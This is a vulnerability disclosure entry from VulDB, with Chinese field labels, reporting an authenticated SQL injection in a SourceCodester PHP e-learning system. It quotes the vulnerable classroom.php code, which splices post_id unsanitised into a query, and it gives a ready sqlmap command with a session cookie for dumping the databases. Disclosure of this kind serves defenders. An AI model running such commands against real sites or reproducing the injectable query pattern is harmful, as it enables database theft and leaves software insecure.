| 标题 | sql injection in Simple E-Learning System(authenticated) |
|---|
| 描述 | the E-Learning System source code url: https://www.sourcecodester.com/php-simple-e-learning-system-source-code
in classroom.php line 42:
code as below
if (isset($_GET['post_id'])) {
$post_id = $_GET['post_id'];
$data_query = mysqli_query($con, "SELECT body FROM posts WHERE id='$post_id'");
$body = mysqli_fetch_array($data_query);
the post_id is directly spliced into the sql query statement,and the $body is directly echo in line 156
so there is a obvious sql injection, you just need a authenticated user。we can use sqlmap to exploit it .Command as below, and the cookie as your own user
python .\sqlmap.py -u "http://127.0.0.1/vcs/classRoom.php?post_id=1&classCode=class101_a" --cookie="PHPSESSID=12blsndrn1t8gcphdj864gbrcu" --dbs |
|---|
| 来源 | ⚠️ https://www.sourcecodester.com/php-simple-e-learning-system-source-code |
|---|
| 用户 | wuerror (UID 30660) |
|---|
| 提交 | 2022-08-05 05時01分 (4 年前) |
|---|
| 管理 | 2022-08-05 07時13分 (2 hours later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 205615 [SourceCodester Simple E-Learning System classroom.php post_id SQL注入] |
|---|
| 积分 | 17 |
|---|